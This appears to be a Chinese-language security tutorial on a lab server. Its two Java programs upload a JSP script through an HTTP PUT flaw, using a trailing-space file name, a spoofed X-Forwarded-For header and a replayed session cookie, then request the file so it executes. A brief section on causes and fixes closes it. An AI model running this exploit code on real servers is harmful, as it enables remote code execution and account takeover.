绕过服务器限制
通过自己构造请求头的形式,绕过服务器的限制,伪造一个请求头进行身份伪造。
java">package com.mtlk.test;
import java.io.*;
import java.net.Socket;
import java.util.Scanner;
public class Put {
public static void main(String[] args) throws IOException {
StringBuffer body = new StringBuffer("");
// InputStream ii = new FileInputStream("E:/123.jsp");
//获取本地文件脚本
InputStream ii = new FileInputStream("E:/qxx.jsp");
Scanner ss = new Scanner(ii);
while(ss.hasNextLine()){
body.append(ss.nextLine());
}
// StringBuilder request = new StringBuilder("PUT /exam/qxx555.jsp%20 HTTP/1.1\r\n");
//设置请求体
StringBuilder request = new StringBuilder("PUT /exam/qxx789.jsp%20 HTTP/1.1\r\n");
request.append("HOST:10.0.100.10\r\n");
request.append("X-Forwarded-For:192.168.18.51\r\n");
request.append("User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 FireFox/78.0\r\n");
request.append("Cookie:JSESSIONID=02C9D0FBFB03537475774E3C1A935A9C\r\n");
// request.append("Content-Type:text/html\r\n");
// request.append("Content-Length:"+body.toString().length()+"\r\n\r\n");
request.append(body.toString());
System.out.println(request.toString());
Socket s = new Socket("10.0.100.10",8080);
PrintWriter pw = new PrintWriter(s.getOutputStream(),true);
pw.println(request.toString());
pw.flush();
InputStream is = s.getInputStream();
Scanner sc = new Scanner(is);
System.out.println("-------------------------------");
while (sc.hasNextLine()){
System.out.println(sc.nextLine());
}
}
}
设置请求体将允许的IP地址,和浏览器信息,甚至cookie信息填入请求体里面。
利用put漏洞上传文件,执行文件脚本内容
再利用get获取文件
java">package com.mtlk.test;
import java.io.IOException;
import java.io.InputStream;
import java.io.PrintWriter;
import java.net.Socket;
import java.util.Scanner;
public class Get {
public static void main(String[] args) throws IOException {
Socket s = new Socket("10.0.100.10",8080);
// StringBuilder sb = new StringBuilder("GET /exam/qxx555.jsp HTTP/1.1\r\n");
//获取服务器文件
StringBuilder sb = new StringBuilder("GET /exam/qxx789.jsp HTTP/1.1\r\n");
//设置对应请求体
sb.append("HOST:10.0.100.10:8080\r\n");
sb.append("User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 FireFox/78.0\r\n");
sb.append("Cookie:02C9D0FBFB03537475774E3C1A935A9C\r\n");
sb.append("X-Forwarded-For:192.168.18.51\r\n");
PrintWriter pw = new PrintWriter(s.getOutputStream());
pw.println(sb.toString());
pw.flush();
System.out.println(sb.toString());
System.out.println("---------------------------------------------");
InputStream is = s.getInputStream();
Scanner ss = new Scanner(is);
while (ss.hasNextLine()){
System.out.println(ss.nextLine());
}
}
}
成因及解决方法
身份伪造
原因
基于session:拿到别人的cookie,然后填充到自己的请求头里面
解决办法
检查session的过期,不能将用户关键信息存放于cookie
把前一个账户踢下线,检查常用IP地址归属地
身份认证失败
原因
没有对Session进行验证,登录后没有填充Session
解决办法
检查登陆后session是否被填充,session是否有验证
在没有登录的情况下访问功能页面并提交请求